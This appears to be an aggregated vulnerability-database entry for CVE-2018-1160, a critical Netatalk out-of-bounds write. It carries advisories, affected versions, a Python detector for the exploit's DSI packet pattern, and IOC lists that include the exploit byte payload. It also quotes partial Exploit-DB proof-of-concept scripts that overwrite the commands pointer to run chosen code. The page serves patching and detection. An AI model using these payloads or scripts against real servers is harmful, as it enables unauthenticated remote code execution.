CVE-2018-1160
Published 2018-12-20
Priority P184 · critical · 9.8 (CVSS 3.1)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EXPLOIT · EPSS 86.54% (99.7th percentile)
Netatalk before 3.1.12 is vulnerable to an out of bounds write in dsi_opensess.c. This is due to lack of bounds checking on attacker controlled data. A remote unauthenticated attacker can leverage this vulnerability to achieve arbitrary code execution.
Affected (11 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | debian_linux | — | — |
| debian | netatalk | < netatalk 2.2.6-2 (bullseye) | netatalk 2.2.6-2 (bullseye) |
| netatalk | netatalk | < 3.1.12 | 3.1.12 |
| netatalk | netatalk | — | — |
| netatalk | netatalk | >= 0 < 2.2.6-2 | 2.2.6-2 |
| netatalk | netatalk | >= 0 < 2.2.6-2 | 2.2.6-2 |
| netatalk | netatalk | >= 0 < 2.2.6-2 | 2.2.6-2 |
| synology | diskstation_manager | >= 5.2 < 5.2-5967-9 | 5.2-5967-9 |
| synology | diskstation_manager | >= 6.1 < 6.1.7-15284-3 | 6.1.7-15284-3 |
| synology | diskstation_manager | >= 6.2 < 6.2.1-23824-4 | 6.2.1-23824-4 |
| synology | router_manager | >= 1.2 < 1.2-7742-5 | 1.2-7742-5 |
Detection & IOCs (extracted from sources)
- command: DSI OpenSession command byte \x04 (open session command) with attnquant option \x01 and oversized length to trigger OOB write in dsi_opensess.c
- bytes: DSI OpenSession exploit payload: \x00\x04\x00\x01\x00\x00\x00\x00\x00\x00\x00\x1a\x00\x00\x00\x00\x01\x18\xad\xaa\xaa\xba\xef\xbe\xad\xde\xfe\xca\x1d\xc0\xce\xfa\xed\xfe
- bytes: DSI OpenSession PoC payload: \x00\x00\x40\x00\x00\x00\x00\x00 + 0xdeadbeef + 0xfeedface + 0x63b660
- The exploit targets TCP port 548 (AFP/DSI protocol). Monitor for unauthenticated DSI OpenSession packets (command byte 0x04) containing an attnquant option (0x01) with an oversized length field that exceeds bounds; this is the trigger for the OOB write in dsi_opensess.c.
- Detect exploitation attempts by looking for DSI OpenSession packets on port 548 where the attnquant option byte (0x01) is followed by a length byte of 0x18 (24 bytes) and the payload contains recognizable canary values such as \xad\xaa\xaa\xba, \xef\xbe\xad\xde, \xfe\xca\x1d\xc0, or \xce\xfa\xed\xfe used to overwrite internal Netatalk structures.
- After the exploit's DSI OpenSession phase, watch for a follow-up AFP command packet (DSI command byte 0x02) with AFP function index byte 0x11 (25th entry in the pre_auth table), which is used to invoke arbitrary code via the overwritten commands pointer. This two-stage pattern (OpenSession exploit + AFP 0x11 dispatch) is characteristic of CVE-2018-1160 exploitation.
- The vulnerability is in dsi_opensess.c; any crash or unexpected termination of the Netatalk afpd process following a DSI OpenSession request from an unauthenticated source should be treated as a potential exploitation attempt.
- The hardcoded memory addresses in the exploit (preauth_switch_base, afp_getsrvrparms, etc.) are specific to a Netatalk build compiled for x86_64 Seagate NAS OS. Exploiting other targets requires re-deriving these addresses, meaning byte-signature detection based on these specific addresses will only match the Seagate-targeted variant.
- The vulnerability affects Netatalk versions before 3.1.12. Debian resolved it in package version 2.2.6-2 across bullseye, forky, sid, and trixie. Detection and patching scope should account for both upstream and downstream package versioning differences.
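The detection notes above describe the trigger structurally (OpenSession command 0x04, option type 0x01, a length byte far larger than a 32-bit quantum) and as a two-stage sequence. The following is an added example written for this page, not code from Netatalk, Tenable or any of the listed sources: a small DSI packet inspector that parses the 16-byte header using the same `>BBHIII` layout the PoC on this page uses, walks the OpenSession type/length/value options, and flags an attention-quantum option whose declared length is not the assumed well-formed size of 4 bytes. The `inspect_stream` function adds the two-stage pattern (malformed OpenSession followed by a DSICommand whose AFP function byte is 0x11). The sample packets are constructed: they copy the IOC layout (option 0x01, length 0x18) with filler bytes rather than the real payload values, and the 4-byte quantum size and the option walk are assumptions made for the example.

```python
import struct

# DSI header layout, as used by the PoC on this page: flags, command, request id,
# error code / data offset, total length, reserved (16 bytes, big-endian).
DSI_HEADER = struct.Struct(">BBHIII")
DSI_COMMAND = 2          # DSICommand: carries an AFP function in its first payload byte
DSI_OPENSESSION = 4      # DSIOpenSession: carries type/length/value options
OPT_ATTN_QUANTUM = 1     # attention quantum option (the "attnquant" option in the IOC list)
ATTN_QUANTUM_LEN = 4     # assumption: a well-formed quantum is a single 32-bit value
AFP_SUSPECT_FUNC = 0x11  # AFP function byte the IOC list associates with the second stage


def parse_dsi(packet: bytes) -> dict:
    """Split one DSI packet into header fields plus the raw payload."""
    if len(packet) < DSI_HEADER.size:
        raise ValueError("packet shorter than the 16-byte DSI header")
    flags, command, req_id, err_or_off, length, reserved = DSI_HEADER.unpack_from(packet)
    return {
        "flags": flags, "command": command, "req_id": req_id,
        "error_or_offset": err_or_off, "length": length, "reserved": reserved,
        "payload": packet[DSI_HEADER.size:],
    }


def opensession_options(payload: bytes):
    """Walk the (type, length, value) options of an OpenSession payload.

    Yields (type, declared_length, value); value is shorter than declared_length
    when the packet ends early, which the caller reports separately.
    """
    i = 0
    while i + 2 <= len(payload):
        opt_type, opt_len = payload[i], payload[i + 1]
        yield opt_type, opt_len, payload[i + 2:i + 2 + opt_len]
        i += 2 + opt_len


def inspect_packet(packet: bytes) -> list:
    """Return human-readable findings for one client-to-server DSI packet."""
    findings = []
    hdr = parse_dsi(packet)
    if hdr["flags"] != 0:          # only requests (flag 0) are of interest here
        return findings
    if hdr["length"] != len(hdr["payload"]):
        findings.append(f"declared length {hdr['length']} != actual payload {len(hdr['payload'])}")
    if hdr["command"] != DSI_OPENSESSION:
        return findings
    for opt_type, opt_len, value in opensession_options(hdr["payload"]):
        if opt_type == OPT_ATTN_QUANTUM and opt_len != ATTN_QUANTUM_LEN:
            findings.append(
                f"attn_quantum option length {opt_len} (expected {ATTN_QUANTUM_LEN}): "
                "oversized copy in dsi_opensess.c, CVE-2018-1160 trigger")
        if len(value) < opt_len:
            findings.append(f"option type {opt_type} declares {opt_len} bytes, only {len(value)} present")
    return findings


def inspect_stream(packets) -> list:
    """Run inspect_packet over one connection's packets in order and add the
    two-stage pattern from the IOC list: a malformed OpenSession followed by a
    DSICommand whose AFP function byte is 0x11."""
    report, primed = [], False
    for idx, pkt in enumerate(packets):
        findings = inspect_packet(pkt)
        if any("attn_quantum" in f for f in findings):
            primed = True
        hdr = parse_dsi(pkt)
        if primed and hdr["command"] == DSI_COMMAND and hdr["payload"][:1] == bytes([AFP_SUSPECT_FUNC]):
            findings.append("DSICommand with AFP function 0x11 after malformed OpenSession: "
                            "two-stage CVE-2018-1160 pattern")
        report.append((idx, findings))
    return report


def build_dsi(command: int, req_id: int, payload: bytes) -> bytes:
    """Helper for the constructed samples below (request flag 0)."""
    return DSI_HEADER.pack(0, command, req_id, 0, len(payload), 0) + payload


# Constructed samples (not captured traffic): a normal OpenSession carrying a
# 4-byte quantum, one that mirrors the IOC layout (option 0x01, length 0x18)
# with filler bytes, and a follow-up DSICommand shaped like the second stage.
BENIGN_OPEN = build_dsi(DSI_OPENSESSION, 1, b"\x01\x04" + struct.pack(">I", 0x4000))
OVERSIZED_OPEN = build_dsi(DSI_OPENSESSION, 1, b"\x01\x18" + b"\x41" * 24)
FOLLOWUP_CMD = build_dsi(DSI_COMMAND, 2, bytes([AFP_SUSPECT_FUNC, 0]) + b"\x00" * 142)

if __name__ == "__main__":
    for idx, findings in inspect_stream([BENIGN_OPEN, OVERSIZED_OPEN, FOLLOWUP_CMD]):
        print(idx, findings or "ok")
```

Run over a pcap-derived stream by feeding each client-to-server TCP payload on port 548 to `inspect_stream` in order; the length check also catches packets cut short in transit so a truncated option never reads past the buffer.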
CVSS provenance

| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | v3.0 | 9.8 | CRITICAL | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 10.0 | CRITICAL | AV:N/AC:L/Au:N/C:C/I:C/A:C |
| osv | — | 9.8 | CRITICAL | — |
| vendor_debian | — | 9.8 | CRITICAL | — |
GHSA
GHSA-j675-7hvj-qfw5: Netatalk before 3 (CVE-2018-1160, CRITICAL, CWE-787)
ghsa (unreviewed) · 2022-05-13
Netatalk before 3.1.12 is vulnerable to an out of bounds write in dsi_opensess.c. This is due to lack of bounds checking on attacker controlled data. A remote unauthenticated attacker can leverage this vulnerability to achieve arbitrary code execution.
OSV
CVE-2018-1160: Netatalk before 3 (CRITICAL)
osv · 2018-12-20 · CVSS 9.8
Netatalk before 3.1.12 is vulnerable to an out of bounds write in dsi_opensess.c. This is due to lack of bounds checking on attacker controlled data. A remote unauthenticated attacker can leverage this vulnerability to achieve arbitrary code execution.
Debian
CVE-2018-1160: netatalk - Netatalk before 3.1.12 is vulnerable to an out of bounds write in dsi_opensess.c... (CRITICAL)
vendor_debian · 2018 · CVSS 9.8
Netatalk before 3.1.12 is vulnerable to an out of bounds write in dsi_opensess.c. This is due to lack of bounds checking on attacker controlled data. A remote unauthenticated attacker can leverage this vulnerability to achieve arbitrary code execution.
Scope: local
bullseye: resolved (fixed in 2.2.6-2)
forky: resolved (fixed in 2.2.6-2)
sid: resolved (fixed in 2.2.6-2)
trixie: resolved (fixed in 2.2.6-2)
No detection rules found.
Exploit-DB
QNAP Netatalk < 3.1.12 - Authentication Bypass (CVE-2018-1160, CRITICAL)
exploitdb · 2019-04-08 · CVSS 9.8
QNAP Netatalk cmd =====
```python
    data += '\x11' # use the 25th entry in the pre_auth table. We'll write the function to execute there
    data += '\x00' # pad
    if (param_string == False):
        data += ("\x00" * 134)
    else:
        data += param_string
        data += ("\x00" * (134 - len(param_string)))
    data += address # we'll jump to this address
    sock.sendall(data)
    return

##
# Parses the DSI header. If we don't get the expected request id
# then we bail out.
##
def parse_dsi(payload, expected_req_id):
    (flags, command, req_id, error_code, length, reserved) = struct.unpack_from('>BBHIII', payload)
    if command != 8:
        if flags != 1 or command != 2 or req_id != expected_req_id:
            print '[-] Bad DSI Header: %u %u %u' % (flags, command, req_id)
            sys.exit(0)
    if error_code != 0 and error_code != 4294962287:
        print '[-] The server resp
```
Exploit-DB
Netatalk 3.1.12 - Authentication Bypass (PoC) (CVE-2018-1160)
exploitdb · 2018-12-21
---
```python
import socket
import struct
import sys

if len(sys.argv) != 3:
    sys.exit(0)

ip = sys.argv[1]
port = int(sys.argv[2])
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "[+] Attempting connection to " + ip + ":" + sys.argv[2]
sock.connect((ip, port))

dsi_payload = "\x00\x00\x40\x00" # client quantum
dsi_payload += '\x00\x00\x00\x00' # overwrites datasize
dsi_payload += struct.pack("I", 0xdeadbeef) # overwrites quantum
dsi_payload += struct.pack("I", 0xfeedface) # overwrites the ids
dsi_payload += struct.pack("Q", 0x63b660) # overwrite commands ptr

dsi_opensession = "\x01" # attention quantum option
dsi_opensession += struct.pack("B", len(dsi_payload)) # length
dsi_opensession += dsi_payload

dsi_header = "\x00" # "request" flag
ds
```
Exploit-DB
Netatalk 3.1.12 - Authentication Bypass (CVE-2018-1160, CRITICAL)
exploitdb · 2018-12-21 · CVSS 9.8
---
```python
##
# Exploit Title: Netatalk Authentication Bypass
# Date: 12/20/2018
# Exploit Author: Jacob Baines
# Vendor Homepage: http://netatalk.sourceforge.net/
# Software Link: https://sourceforge.net/projects/netatalk/files/
# Version: Before 3.1.12
# Tested on: Seagate NAS OS (x86_64)
# CVE : CVE-2018-1160
# Advisory: https://www.tenable.com/security/research/tra-2018-48
##

import argparse
import socket
import struct
import sys

# Known addresses:
# This exploit was written against a Netatalk compiled for an
# x86_64 Seagate NAS. The addresses below will need to be changed
# for a different target.
preauth_switch_base = '\x60\xb6\x63\x00\x00\x00\x00\x00' # 0x63b6a0
afp_getsrvrparms = '\x60\xb6\x42\x00\x00\x00\x00\x00' # 0x42b660
afp_openvol = '\xb0\
```
References
- http://netatalk.sourceforge.net/3.1/ReleaseNotes3.1.12.html
- http://packetstormsecurity.com/files/152440/QNAP-Netatalk-Authentication-Bypass.html
- http://www.securityfocus.com/bid/106301
- https://attachments.samba.org/attachment.cgi?id=14735
- https://github.com/tenable/poc/tree/master/netatalk/cve_2018_1160/
- https://www.debian.org/security/2018/dsa-4356
- https://www.exploit-db.com/exploits/46034/
- https://www.exploit-db.com/exploits/46048/
- https://www.exploit-db.com/exploits/46675/
- https://www.synology.com/security/advisory/Synology_SA_18_62
- https://www.tenable.com/security/research/tra-2018-48